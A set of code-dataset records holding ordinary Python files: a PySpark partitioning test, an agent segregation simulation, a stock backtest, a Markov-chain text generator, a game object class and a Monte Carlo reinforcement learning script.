setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of blockgroups in total: {len(blockgroups)}\")\n blocks = rdd.map(lambda partition: listOfGeocodes(partition, lengths[2])).reduce(set.union)#.map(lambda setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of blocks in total: {len(blocks)}\")\n\n # For each geolevel, how many distinct tract, county, or block codes were in each partition?\n numTracts = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[0]), 1)).reduceByKey(add).collect()\n totalTracts = sum([a*b for a, b in numTracts])\n print(f\"distribution of #tracts per partition:\")\n print(numTracts)\n print(f\"total: {totalTracts}, min: {min([a for a,b in numTracts])}, max: {max([a for a,b in numTracts])}\")\n numBlockgroups = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[1]), 1)).reduceByKey(add).collect()\n totalBlockgroups = sum([a*b for a, b in numBlockgroups])\n print(f\"distribution of #blockgroups per partition:\")\n print(numBlockgroups)\n print(f\"total: {totalBlockgroups}, min: {min([a for a,b in numBlockgroups])}, max: {max([a for a,b in numBlockgroups])}\")\n numBlocks = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[2]), 1)).reduceByKey(add).collect()\n totalBlocks = sum([a*b for a, b in numBlocks])\n print(f\"distribution of #blocks per partition:\")\n print(numBlocks)\n print(f\"total: {totalBlocks}, min: {min([a for a,b in numBlocks])}, max: {max([a for a,b in numBlocks])}\")\n\n # On avg, for each geolevel, how many partitions was each tract, county, or block code in?\n # (not yet implemented; a little more complicated than distribution of #geounits per partition)\n\n print(\"---------------------\\n\")\n\ndef dfAnalysisDriver(sc, mode=\"small\"):\n \"\"\"\n This example is too big for prints of glom().collect() to work, so we instead measure:\n\n - On avg for each geolevel, how many partitions was each tract, county, or block code in?\n - How many partitions were empty?\n - How many partitions were there in total?\n - What was the distribution of partition sizes?\n \"\"\"\n print(f\"*** Executing dataframes analysis driver in mode {mode} ***\")\n numRepartitions = LARGE_NUM_REPARTITIONS if mode==\"large\" else SMALL_NUM_REPARTITIONS\n csvFile = largeCsvFile if mode==\"large\" else smallCsvFile\n aggLen = 7 if mode==\"large\" else 4\n\n sqlContext = SQLContext(sc)\n print(f\"Loading {csvFile} into dataframe...\")\n df1 = sqlContext.read.format(\"csv\").option(\"header\", \"true\").load(csvFile)\n df1.printSchema()\n numRecords, numCols = df1.count(), len(df1.columns)\n print(f\"numRecords: {numRecords}, numCols: {numCols}\")\n\n df1 = df1.withColumn(\"partitionCode\", substring(\"geocode\",0,aggLen)) # Initial df\n df2 = df1.repartition(numRepartitions) # Default hash code repartitioning\n df3 = df1.repartition(numRepartitions, 'partitionCode').drop('partitionCode') # hashCode repartition based on partitionCode\n df4 = df1.repartitionByRange(numRepartitions, 'partitionCode').drop('partitionCode') # range repartition based on partitionCode\n dfs = [df1, df2, df3, df4]\n dfLabels = [\"initial\",\"hash default repartition\",\"hash repartition by partitionCode\", \"range repartition by partitionCode\"]\n for df, dfLabel in zip(dfs, dfLabels):\n print(f\"Processing example spark dataframe: {dfLabel}\")\n print(\"dataframe schema:\")\n df.printSchema()\n getAndPrintRddStatistics(df, mode=mode)\n\n print(\"<--- Done analysis. 
---> \\n\\n\")\n\ndef main():\n sc = pyspark.SparkContext()\n quiet_logs(sc)\n dfAnalysisDriver(sc, mode=\"small\")\n dfAnalysisDriver(sc, mode=\"large\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"spark_partitioning_tests.py","file_name":"spark_partitioning_tests.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"94767428","text":"#初始实验\nimport matplotlib\n#for Canopy users\nimport matplotlib.animation as animation\n#for EPD users\n#matplotlib.use('TkAgg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\n\n# set parameters\nN= 50\nT= 100\nW= 30\nSEED=101\nagents= []\n\n#TH=0.3\ncolorlist=['red', 'blue']\n\n\n## define functions\ndef clip(x):\n if x<0:\n return(x+W)\n elif x>=W:\n return(x-W)\n else:\n return(x)\n\n## define classes\nclass Agent(object):\n def __init__(self, sp):\n self.x= rnd.randint(0, W-1)\n self.y= rnd.randint(0, W-1)\n self.p= sp\n self.s= 0\n\n def randomwalk(self):\n self.x+= rnd.randint(-1, 1)\n self.y+= rnd.randint(-1, 1)\n self.x= clip(self.x)\n self.y= clip(self.y)\n\n def isOverlapped(self):\n for a in agents:\n if((a.x==self.x and a.y==self.y) and (a!=self)):\n return(True)\n return(False)\n\n def findNewSpace(self):\n self.randomwalk()\n if(self.isOverlapped()==True):\n self.findNewSpace()\n\n def updateSatisfaction(self):\n neighbors= [a for a in agents \\\n if (abs(a.x-self.x)<=1 and \\\n abs(a.y-self.y)<=1) and a!=self]\n neighborsCount= len(neighbors)\n\n sameCount= len([a for a in neighbors \\\n if (a.p==self.p)])\n self.s= (float(sameCount)/float(neighborsCount) \\\n if neighborsCount!=0 else 0.0)\n\n def seek(self):\n self.updateSatisfaction()\n if(self.s 实际买入数:对卖出列表进行排序\n #if len(sellList) > numOfActualBuy:\n sellList = getToSellInSellList(sellList,tradingDate,signalData,dailyQuote,numOfToKeepInSellList,cannotSellList,currHoldSet)\n if len(sellList) == 0:\n return\n\n #numOfActualSell = 0\n for innerCode in sellList:\n #print('innerCode:' + str(innerCode))\n try:\n dailyQuoteRow = SourceDataDao.select_by_inner_code_and_date(dailyQuote, tradingDate, innerCode)\n except:\n #退市的股票: 查询不到行情,取最后一个交易日\n dailyQuoteRow = SourceDataDao.selectByLastDay(dailyQuote,innerCode)\n #print('innerCode:' + str(innerCode))\n # print(dailyQuoteSingle)\n #try:\n turnoverValue = dailyQuoteRow[\"TurnoverValue\"]\n #except:\n #print('tradingDate:'+dateStr)\n #print('innerCode:' + str(innerCode))\n #print(dailyQuoteRow)\n turnoverVolume = dailyQuoteRow[\"TurnoverVolume\"]\n #prevClosePrice = dailyQuoteRow[\"PrevClosePrice\"]\n #closePrice = dailyQuoteRow[\"ClosePrice\"]\n #highPrice = dailyQuoteRow[\"HighPrice\"]\n #lowPrice = dailyQuoteRow[\"LowPrice\"]\n #sellFlg = dailyQuoteRow[StockConst.sellFlg]\n #buyFlg = dailyQuoteRow[\"buyFlg\"]\n #sellFlg = dailyQuoteRow[\"sellFlg\"]\n #非停牌\n #check1 = not BackTestHelper.isStop(closePrice, turnoverValue)\n #非一字跌停: 可以卖出\n #check2 = not BackTestHelper.isYiZiDieTing(highPrice,lowPrice,prevClosePrice)\n\n #可卖\n #if sellFlg != -1:\n #实际卖出数不能大于实际买入数\n #if numOfActualSell >= numOfActualBuy:\n #continue\n actualSellList.append(innerCode)\n stockHoldEntity = currHoldSet.pop(innerCode)\n vol = stockHoldEntity.vol\n sellPrice = turnoverValue / turnoverVolume\n #卖出后所得资金(没有扣佣金)\n turnover = sellPrice * vol\n # 佣金(元)\n commission = BackTestHelper.get_sell_commission(turnover, StockConst.SELL_COMMISSION / 100)\n # 扣掉佣金后所得金额\n turnover = turnover - commission\n # 更新可用金额(增加)\n 
capitalEntity.increase_usable_cash(turnover)\n # 加入交易表\n stockTradeDict = {'tradingDate': tradingDate, 'innerCode': innerCode, 'type': -1, 'vol': vol, 'price': sellPrice,\n 'turnover': turnover, 'commission': commission}\n stockTradeList.append(stockTradeDict)\n #实际卖出数\n #numOfActualSell += 1\n \"\"\"\n if DateUtil.datetime2Str(tradingDate) == '2014-12-09':\n print('-----handleSellList-----')\n print(DateUtil.datetime2Str(tradingDate))\n print(innerCode)\n print(vol)\n print(sellPrice)\n print(turnoverValue)\n print(dailyQuoteRow)\n print('----------')\n \"\"\"\n\n #changePCT = NumUtil.getChangePCT(prevClosePrice, sellPrice, 2)\n #realChangePCT = (changePCT - StockConst.sellCommission) * vol / 100.0\n #partChangePCT = partChangePCT + realChangePCT\n \"\"\"\n if dateStr == '2001-01-17':\n print(\"vol:\"+str(vol)+\" turnoverValue:\"+str(turnoverValue)+\" turnoverVolume:\"+str(turnoverVolume)+\n \" prevClosePrice:\"+str(prevClosePrice)+\" closePrice:\"+str(closePrice)+\" sellPrice:\"+str(sellPrice)+\n \" changePCT:\"+str(changePCT)+\n \" realChangePCT:\"+str(realChangePCT)+\" partChangePCT:\"+str(partChangePCT))\n \"\"\"\n #else:\n #cannotSellList.append(innerCode)\n #return partChangePCT\n\n\"\"\"\ndef handleHoldList(tradingDate,holdList,dailyQuote,usableVol,stockHoldDF,stockTradeDF,currHoldSet):\n partChangePCT = 0\n #dateStr = DateUtil.datetime2Str(tradingDate)\n if len(holdList) == 0:\n return 0\n\n for innerCode in holdList:\n dailyQuoteRow = SourceDataDao.selectByInnerCodeAndDate(dailyQuote, tradingDate, innerCode)\n #print('innerCode:' + str(innerCode))\n # print(dailyQuoteSingle)\n turnoverValue = dailyQuoteRow[\"TurnoverValue\"]\n #turnoverVolume = dailyQuoteRow[\"TurnoverVolume\"]\n prevClosePrice = dailyQuoteRow[\"PrevClosePrice\"]\n closePrice = dailyQuoteRow[\"ClosePrice\"]\n #非停牌\n if (closePrice != 0) & (turnoverValue != float(0)):\n vol = currHoldSet.get(innerCode)\n changePCT = NumUtil.getChangePCT(prevClosePrice, closePrice, 2)\n realChangePCT = changePCT * vol / 100.0\n partChangePCT = partChangePCT + realChangePCT\n\n return partChangePCT\n\"\"\"\n\n#今日选股和昨日选股的差集\n#currSourceData: dataFrame\n#currHoldSet: dict\n#return: innerCode list\n#currList - lastList\ndef getDifference(currSourceData, currHoldSet, typ):\n currList = []\n lastList = []\n\n if len(currSourceData) != 0:\n #for index, row in currSourceData.iterrows():\n #currList.append(index[1])\n currList = list(currSourceData.index.get_level_values(1))\n\n if len(currHoldSet) != 0:\n #for innerCode in currHoldSet:\n #lastList.append(innerCode)\n lastList = list(currHoldSet.keys())\n lastList.sort()\n\n #currList - lastList\n if typ == 1:\n returnList = SetUtil.difference(currList, lastList)\n #lastList - currList\n else:\n returnList = SetUtil.difference(lastList, currList)\n return returnList\n\n\n#今日选股和昨日选股的交集\n#currSourceData: dataFrame\n#currHoldSet: dict\n#return: innerCode list\n#currList 交集 lastList\ndef getIntersection(currSourceData, currHoldSet):\n currList = []\n lastList = []\n\n if len(currSourceData) != 0:\n #for index, row in currSourceData.iterrows():\n #currList.append(index[1])\n currList = list(currSourceData.index.get_level_values(1))\n\n if len(currHoldSet) != 0:\n #for innerCode in currHoldSet:\n #lastList.append(innerCode)\n lastList = list(currHoldSet.keys())\n lastList.sort()\n\n returnList = SetUtil.intersection(currList, lastList)\n return returnList\n\n#买入列表\ndef getBuyList(currSourceData, currHoldSet):\n return getDifference(currSourceData,currHoldSet,1)\n\n#卖出列表\ndef 
getSellList(currSourceData, currHoldSet):\n return getDifference(currSourceData,currHoldSet,-1)\n\n#昨日持有列表\ndef getPrevHoldList(currSourceData, currHoldSet):\n return getIntersection(currSourceData,currHoldSet)\n\n#遍历持仓表\n\"\"\"\ndef calculateUsableVol(currHoldSet):\n currVol = 0;\n for innerCode in currHoldSet:\n vol = currHoldSet[innerCode]\n currVol = currVol + vol\n return 100 - currVol\n\"\"\"\n\n#计算当日总市值:股票市值+可用资金\n#closePrice mv放入持仓表\ndef calculateDailyMV(currHoldSet,capitalEntity,dailyQuote,tradingDate,stockHoldDailyList,initialMV):\n usableCach = capitalEntity.get_usable_cash()\n dailyMV = 0\n for innerCode in currHoldSet:\n dailyQuoteRow = SourceDataDao.select_by_inner_code_and_date(dailyQuote, tradingDate, innerCode)\n stockHoldEntity = currHoldSet[innerCode]\n vol = stockHoldEntity.vol\n # print('innerCode:' + str(innerCode))\n closePrice = dailyQuoteRow[\"ClosePrice\"]\n mv = vol * closePrice\n dailyMV += mv\n #stockHoldEntity.setClosePrice(closePrice)\n #stockHoldEntity.setMV(mv)\n cost = stockHoldEntity.cost\n profit = (closePrice-cost) *vol\n\n holdDict = {'tradingDate': tradingDate,\n 'innerCode': innerCode,\n 'vol': vol,\n 'buyPrice': stockHoldEntity.buyPrice,\n 'cost': cost,\n 'closePrice': closePrice,\n 'mv': mv,\n 'profit': profit,\n 'profitPCT': NumUtil.get_round(profit / initialMV * 100, 5)}\n\n stockHoldDailyList.append(holdDict)\n #print('dailyMV:' + str(dailyMV))\n #print('usableCach:' + str(usableCach))\n dailyMV = dailyMV + usableCach\n return dailyMV\n\n\"\"\"\n#stockHoldDaily: 每日持仓表\n#currHoldSet转stockHoldDailyList\ndef handleStockHoldDaily(currHoldSet, stockHoldDailyList, tradingDate):\n #print('--------------------')\n for innerCode in currHoldSet:\n stockHoldEntity = currHoldSet[innerCode]\n #print('tradingDate:'+DateUtil.datetime2Str(tradingDate)+'innerCode:'+str(innerCode))\n holdDict = {'tradingDate':tradingDate,\n 'innerCode':innerCode,\n 'vol':stockHoldEntity.vol,\n 'closePrice': stockHoldEntity.closePrice,\n 'mv': stockHoldEntity.mv}\n stockHoldDailyList.append(holdDict)\n\"\"\"\n\ndef debugDailyQuote(groupedSignalData):\n \"\"\"\n # 行情数据Debug\n #dailyQuoteToDebug = pd.DataFrame()\n signalDataToDebug = groupedSignalData.ix['2001-07-30']\n print('行情数据:')\n print('signalDataToDebug:'+str(len(signalDataToDebug)))\n for index, row in signalDataToDebug.iterrows():\n tradingDate = index[0]\n innerCode = index[1]\n dailyQuoteRow = SourceDataDao.selectByInnerCodeAndDate(dailyQuote, tradingDate, innerCode)\n #dailyQuoteToDebug.append(dailyQuoteRow)\n print(dailyQuoteRow)\n #dailyQuoteToDebug.to_csv(StockConst.root + '\\export\\dailyQuoteToDebug.csv')\n \"\"\"\n\n#主程序\n@TimeUtil.check_consumed_time2\ndef main():\n signalData = SourceDataDao.getSignalData()\n #dailyQuote = SourceDataDao.getDailyQuote()\n dailyQuote = SourceDataDao.getNewDailyQuote()\n\n #columns filter\n #df3 = sourceData.loc[(df['Mom'] <= 4) & (df['Mom'] <= 4), ['Mom']]\n\n #index filter\n #startDate=DateUtils.str2Datetime('20010105');\n #endDate=DateUtils.str2Datetime('20010111');\n #df4 = df3.ix[startDate:endDate]\n\n numOfDailyHolding = 5\n\n #select top 5 group by TradingDay order by Mom desc\n groupedSignalData = signalData.groupby(level='TradingDay').apply(SelectUtil.top,numOfDailyHolding,'Mom',False)\n\n #param\n #period = 5\n #startDate = '1/8/2001'\n startDate = '1/8/2001'\n #endDate = '1/1/2017'\n #eendDate = '5/18/2001'\n endDate = '12/31/2016'\n #endDate = '12/31/2002'\n #endDate = '1/9/2001'\n\n #time series\n #dateList = DateUtil.getDateList2(startDate,endDate)\n\n #当前持仓 
key:innerCode value:\n currHoldSet = {}\n stockHoldDF = {}\n stockTradeList = []\n #资金情况\n #capitalDict = {'usableCach':1000000}\n #初始资金\n initialMV = 1000000\n capitalEntity = CapitalEntity.CapitalEntity(initialMV)\n lastMV = initialMV\n\n #lastSignalData = pd.DataFrame()\n usableVol = 100;\n netValue = 1;\n #初始化每日统计表\n stockStatDailyDf = pd.DataFrame(index=pd.date_range(startDate, endDate),\n columns=['netValue','changePCT','buyCnt','sellCnt','prevHoldCnt','currHoldCnt','cannotSellCnt','cannotBuyCnt',\n 'usableCach','mv'])\n #初始化每日持仓表\n stockHoldDailyList = []\n #从信号表中取得唯一性日期\n dateList = SourceDataDao.select_date_from_signal(signalData, startDate, endDate)\n for date in dateList:\n dateStr = DateUtil.datetime2_str(date)\n #print(dateStr)\n #isinstance(date, datetime)\n\n # select by single date\n #try:\n\n #print(1)\n currSignalData = groupedSignalData.ix[date]\n if StockConst.IS_DEBUG:\n print(\"currSignalData:\"+str(len(currSignalData)))\n #print(2)\n buyList = getBuyList(currSignalData,currHoldSet)\n #print(3)\n sellList = getSellList(currSignalData,currHoldSet)\n #print(4)\n prevHoldList = getPrevHoldList(currSignalData,currHoldSet)\n #print(currSignalData)\n \"\"\"\n if (dateStr >= '2015-01-05') & (dateStr <= '2015-01-05'):\n print('-----'+dateStr+'-----')\n #print(currSignalData)\n #print(buyList)\n print(list(currHoldSet.keys()))\n for key in currHoldSet.keys():\n print(str(key) + ':' + currHoldSet.get(key).openDate)\n print('----------------')\n \"\"\"\n #except:\n #假期,双休日,原数据问题\n #if StockConst.isDebug:\n #print(DateUtil.datetime2Str(date) + ': no data')\n #continue\n\n dailyChangePCT = 0\n actualSellList=[]\n actualBuyList=[]\n cannotSellList=[]\n cannotBuyList = []\n\n #实际买入个数\n numOfActualBuy = getNumOfActualBuy(date, buyList, dailyQuote)\n #1.sell changePCTSell\n handleSellList(date,sellList,dailyQuote,usableVol,stockHoldDF,stockTradeList,currHoldSet,actualSellList,cannotSellList,\n capitalEntity,numOfActualBuy,signalData,prevHoldList,numOfDailyHolding)\n #usableVol = calculateUsableVol(currHoldSet)\n #2.buy changePCTBuy\n handleBuyList(date,buyList,dailyQuote,usableVol,stockHoldDF,stockTradeList,currHoldSet,actualBuyList,cannotBuyList,capitalEntity)\n #3.hold\n #changePCTHold = handleHoldList(date,prevHoldList,dailyQuote,usableVol,stockHoldDF,stockTradeDF,currHoldSet)\n #changePCTHold = 0\n\n currMV = calculateDailyMV(currHoldSet, capitalEntity, dailyQuote, date, stockHoldDailyList, initialMV)\n\n #handleStockHoldDaily(currHoldSet, stockHoldDailyList, date)\n\n buyCnt = len(actualBuyList)\n sellCnt = len(actualSellList)\n prevHoldCnt = len(prevHoldList)\n currHoldCnt = len(currHoldSet)\n cannotSellCnt = len(cannotSellList)\n cannotBuyCnt = len(cannotBuyList)\n\n #if StockConst.isDebug:\n #print(\"dateStr:\" + dateStr + \" changePCTBuy:\" + str(changePCTBuy) + \" changePCTSell:\" + str(changePCTSell) +\n #\" changePCTHold:\" + str(changePCTHold))\n\n #dailyChangePCT = changePCTBuy+changePCTSell+changePCTHold\n #print(\"dailyChangePCT:\"+str(dailyChangePCT))\n #netValue = netValue * (1 + dailyChangePCT / 100)\n #每日净值\n netValue = currMV / initialMV\n #print(\"netValue:\" + str(netValue))\n #每日收益\n dailyChangePCT = NumUtil.get_change_pct(lastMV, currMV, 2)\n #每日可用现金\n usableCach = capitalEntity.get_usable_cash()\n stockStatDailyDf.ix[dateStr] = netValue,dailyChangePCT,buyCnt,sellCnt,prevHoldCnt,currHoldCnt,cannotSellCnt,cannotBuyCnt,usableCach,currMV\n\n lastMV = currMV\n\n #debug 行情数据\n debugDailyQuote(groupedSignalData)\n\n # 信号数据\n #groupedSignalData.to_csv(StockConst.root 
+ '\\export\\groupedSignalData.csv')\n\n # 每日交易\n # print('每日交易:')\n stockTradeDailyDf = pd.DataFrame(stockTradeList)\n stockTradeDailyDf.sort_values(by=['tradingDate'], ascending=True)\n stockTradeDailyDf.to_csv(StockConst.ROOT + '\\export\\stockTradeDaily.csv')\n\n # 每日持仓\n #print('每日持仓:')\n stockHoldDailyDf = pd.DataFrame(stockHoldDailyList)\n stockHoldDailyDf.sort_values(by=['tradingDate'],ascending=True)\n stockHoldDailyDf.to_csv(StockConst.ROOT + '\\export\\stockHoldDaily.csv')\n\n #每日统计(收益,净值,买入数,卖出数,持有数)\n stockStatDailyDf = stockStatDailyDf.dropna(how='all')\n print('每日统计:')\n print(stockStatDailyDf)\n stockStatDailyDf.to_csv(StockConst.ROOT + '\\export\\stockStatDaily.csv')\n\n # 每年统计\n yearDf = StockYearService.main(stockStatDailyDf)\n print('每年统计:')\n print(yearDf)\n\n # 最大回撤\n maxdrop = StockMaxDropNewService.get_max_drop(stockStatDailyDf)\n print('最大回撤:')\n print(maxdrop)\n #每年的最大回撤\n maxdropDf = StockMaxDropNewService.get_max_drop_for_each_year(stockStatDailyDf)\n maxdropDf.sort_values(by=[\"year\"])\n print('每年的最大回撤:')\n print(maxdropDf)\n\n #夏普比率\n sharpRatio = SharpRatioNewService.get_sharp_ratio(stockStatDailyDf)\n print('夏普比率:')\n print(sharpRatio)\n #每年的夏普比率\n sharpRatioDf = SharpRatioNewService.get_sharp_ratio_for_each_year(stockStatDailyDf)\n sharpRatioDf.sort_values(by=[\"year\"])\n print('每年的夏普比率:')\n print(sharpRatioDf)\n\n\n\nmain()\n\n\n\n\n","sub_path":"backtest/backtest/Main/BackTestMain20170301.py","file_name":"BackTestMain20170301.py","file_ext":"py","file_size_in_byte":23331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"369889366","text":"import numpy as np\nimport random\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"создание цепочки\")\nparser.add_argument(\"--model\", type=str, help=\"путь до модели\")\nparser.add_argument(\"--seed\", type=str, default=\"\", help=\"Начальное слово. 
Опционально\")\nparser.add_argument(\"--length\", type=int, help=\"Длина модели\")\nargs = parser.parse_args()\n\nmodel = args.model  # path to the model file\nseed = args.seed\nlength = args.length\n\n# load the dictionary\ndiction = dict()\nfirst_word = []\nwith open(model, \"r\", encoding=\"UTF-8\") as file:\n    for line in file:\n        line = line.split()\n        word = line[0]\n        next_word = line[1]\n        frequency = int(line[2])\n        if word not in first_word:\n            first_word.append(word)\n        if word in diction:\n            diction[word].setdefault(next_word, frequency)\n        else:\n            diction.setdefault(word, {next_word: frequency})\n\nsize_first_word = len(first_word)\nif seed == \"\":\n    rand = random.randint(0, size_first_word - 1)  # randint is inclusive on both ends, so subtract 1\n    seed = first_word[rand]\n\n# build the chain\nnew_text = [seed]  # the words of the generated sequence\nfor i in range(length - 1):\n    list_next_words = []  # words that may follow the current one\n    if new_text[i] not in diction:  # if the last word is not in the dictionary, take a random one\n        rand = random.randint(0, size_first_word - 1)  # inclusive upper bound again\n        new_text.append(first_word[rand])\n        continue\n    frequency = []  # probability for each word in list_next_words\n    number = 0  # total frequency over list_next_words\n    for two_word in diction[new_text[i]]:  # iterate over all second words\n        number += diction[new_text[i]][two_word]  # accumulate the total frequency\n        list_next_words.append(two_word)  # collect a possible next word from the dictionary\n    for j in range(len(list_next_words)):  # normalize the frequencies\n        frequency.append(diction[new_text[i]][list_next_words[j]] / number)  # probability of this word\n    # weighted random choice of the next word according to the probabilities\n    selected_word = np.random.choice(list_next_words, p=frequency)\n    new_text.append(selected_word)  # append it\nfor words in new_text:\n    print(words, end=\" \")\nprint()\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"388134232","text":"class GameObject(object):\n    #Border Behaviours\n    NONE = 0\n    STOP = 1\n    WRAP = 2\n    BOUNCE = 3\n    DIE = 4\n    \n    #Color of ships\n    COLOR_BLUE = 0\n    COLOR_RED = 1\n    COLOR_GREEN = 2\n    COLOR_YELLOW = 3\n    #Type of GameObjects\n    TYPE_ENEMY = 0\n    TYPE_PLAYER = 1\n    TYPE_PROYECTILE = 2\n    def __init__(self):\n        self.mX = 0\n        self.mY = 0\n        self.mMinX = 0\n        self.mMaxX = 0\n        self.mMinY = 0\n        self.mMaxY = 0\n        self.mVelX = 0\n        self.mVelY = 0\n        self.mAccelX = 0\n        self.mAccelY = 0\n        self.mBoundAction = GameObject.NONE\n        self.mIsDead = False\n        self.mState = 0\n        self.mTimeState = 0\n    #Defines border behaviour\n    def setBoundAction(self, aBoundAction):\n        self.mBoundAction = aBoundAction\n\n    def checkBounds(self):\n        #If none, we don't check border collision\n        if (self.mBoundAction == GameObject.NONE):\n            return\n        #Which borders we are touching\n        left = (self.mX < self.mMinX)\n        right = (self.mX > self.mMaxX)\n        up = (self.mY < self.mMinY)\n        down = (self.mY > self.mMaxY)\n        \n        #If no collisions, we don't do anything\n        if not (left or right or up or down):\n            return\n        if (self.mBoundAction == GameObject.WRAP):\n            if(left):\n                self.mX = self.mMaxX\n            if(right):\n                self.mX = self.mMinX\n            if(up):\n                self.mY = self.mMaxY\n            if(down):\n                self.mY = self.mMinY\n        #If Action is STOP,BOUNCE, or DIE we correct position otherwise object\n        #remains out of bounds\n        else:\n            if(left):\n                self.mX = self.mMinX\n            if(right):\n                self.mX = self.mMaxX\n            if(up):\n                self.mY = self.mMinY\n            if(down):\n                self.mY = self.mMaxY\n\n            if(self.mBoundAction 
== GameObject.STOP or self.mBoundAction == GameObject.DIE):\n self.mVelX = 0\n self.mVelY = 0\n \n elif(self.mBoundAction == GameObject.BOUNCE):\n if (left or right):\n self.mVelX *= -1\n if (up or down):\n self.mVelY *= -1\n if(self.mBoundAction == GameObject.DIE):\n self.mIsDead = True\n return\n \n def die(self):\n self.mIsDead = True\n \n def isDead(self):\n return self.mIsDead\n \n def setVelXY(self,aVelX,aVelY):\n self.mVelX = aVelX\n self.mVelY = aVelY\n\n def setVelX(self,aVelX):\n self.mVelX = aVelX\n\n def setVelY(self,aVelY):\n self.mVelY = aVelY\n\n def getVelX(self):\n return self.mVelX\n\n def getVelY(self):\n return self.mVelY\n \n def stopMove(self):\n self.mVelX = 0\n self.mVelY = 0\n self.mAccelX = 0\n self.mAccelY = 0\n \n def setAccel(self,aAccelX,aAccelY):\n self.mAccelX = self.aAccelX\n self.mAccelY = self.aAccelY\n \n def setXY(self,aX,aY):\n\n self.mX = aX\n self.mY = aY\n\n def setX(self,aX):\n self.mX = aX\n\n def setY(self,aY):\n self.mY = aY\n \n def setBounds(self,aMinX,aMaxX,aMinY,aMaxY):\n\n self.mMinX = aMinX\n self.mMaxX = aMaxX\n self.mMinY = aMinY\n self.mMaxY = aMaxY\n \n def getX(self):\n return self.mX\n\n def getY(self):\n return self.mY\n\n def getState(self):\n return self.mState\n\n def setState(self, aState):\n self.mState = aState\n self.mTimeState = 0\n\n def getTimeState(self):\n return self.mTimeState\n\n def update(self):\n self.mTimeState = self.mTimeState + 1\n self.mVelX = self.mVelX + self.mAccelX\n self.mVelY = self.mVelY + self.mAccelY\n self.mX += self.mVelX\n self.mY += self.mVelY\n self.checkBounds()\n \n def destroy(self):\n pass\n\n \n \n","sub_path":"api/GameObject.py","file_name":"GameObject.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"158440432","text":"import sys\nfrom collections import defaultdict\nimport itertools\nfrom gym import make\nimport gym_workflow.envs\nimport agents.utils.plotting as plt\nfrom collections import namedtuple\nimport numpy as np\n\nif __name__ == '__main__':\n\t# Author: dennybritz\n\t# From URL: https://github.com/dennybritz/reinforcement-learning/blob/master/MC/MC%20Prediction%20Solution.ipynb\n\tdef mc_prediction(policy, env, num_episodes, discount_factor=1.0):\n\t\t\"\"\"\n\t\t\tMonte Carlo prediction algorithm. Calculates the value function\n\t\t\tfor a given policy using sampling.\n\n\t\t\tArgs:\n\t\t\t\tpolicy: A function that maps an observation to action probabilities.\n\t\t\t\tenv: OpenAI gym environment.\n\t\t\t\tnum_episodes: Number of episodes to sample.\n\t\t\t\tdiscount_factor: Gamma discount factor.\n\n\t\t\tReturns:\n\t\t\t\tA dictionary that maps from state -> value.\n\t\t\t\tThe state is a tuple and the value is a float.\n\t\t\"\"\"\n\t\t# Keeps track of sum and count of returns for each state\n\t\t# to calculate an average. 
We could use an array to save all\n\t\t# returns (like in the book) but that's memory inefficient.\n\t\treturns_sum = defaultdict(float)\n\t\treturns_count = defaultdict(float)\n\n\t\t# The publication value function\n\t\tV = defaultdict(float)\n\n\t\t# EpisodeStats = namedtuple(\"Stats\", [\"episode_states\", \"episode_actions\", \"episode_rewards\"])\n\t\t# stats = EpisodeStats(\n\t\t# \tepisode_states=np.zeros(num_episodes),\n\t\t# \tepisode_actions=np.zeros(num_episodes),\n\t\t# \tepisode_rewards=np.zeros(num_episodes)\n\t\t# )\n\n\t\tfor i_episode in range(1, num_episodes + 1):\n\t\t\t# Print out which episode we're on, useful for debugging.\n\t\t\tif i_episode % 1000 == 0:\n\t\t\t\tprint(\"\\rEpisode {}/{}.\".format(i_episode, num_episodes), end=\"\")\n\t\t\t\tsys.stdout.flush()\n\n\t\t\t# Generate an episode.\n\t\t\t# An episode is an array of (state, action, reward) tuples\n\t\t\tepisode = []\n\t\t\tstate = env.reset()\n\t\t\tfor t in range(100):\n\t\t\t\taction = policy(state, env)\n\t\t\t\tnext_state, reward, done, _ = env.step(action)\n\t\t\t\tepisode.append((next_state, action, reward))\n\t\t\t\t# stats.episode_states[i_episode] = state\n\t\t\t\t# stats.episode_actions[i_episode] = action\n\t\t\t\t# stats.episode_rewards[i_episode] = reward\n\t\t\t\tif done:\n\t\t\t\t\tbreak\n\t\t\t\tstate = next_state\n\n\t\t\t# Find all states the we've visited in this episode\n\t\t\t# We convert each state to a tuple so that we can use it as a dict key\n\t\t\tstates_in_episode = set([tuple(x[0]) for x in episode])\n\t\t\tfor state in states_in_episode:\n\t\t\t\t# Find the first occurance of the state in the episode\n\t\t\t\tfirst_occurence_idx = next(i for i, x in enumerate(episode) if x[0] == state)\n\t\t\t\t# Sum up all rewards since the first occurance\n\t\t\t\tG = sum([x[2] * (discount_factor ** i) for i, x in enumerate(episode[first_occurence_idx:])])\n\t\t\t\t# Calculate average return for this state over all sampled episodes\n\t\t\t\treturns_sum[state] += G\n\t\t\t\treturns_count[state] += 1.0\n\t\t\t\tV[state] = returns_sum[state] / returns_count[state]\n\n\t\treturn V\n\n\n\tdef wf_policy(observation, env):\n\t\t# Depend on the observation what actions I should be doing\n\t\t# cs, cn, im = observation\n\n\t\treturn env.action_space.sample()\n\t\n\t\n\tenv = make('Montage-v3')\n\tepisodes = 10000\n\n\tV_10k = mc_prediction(wf_policy, env, num_episodes=episodes)\n\tprint(V_10k)\n\t\n\tplt.plot_value_function(V_10k, title=\"Monte Carlo First Visit with {} 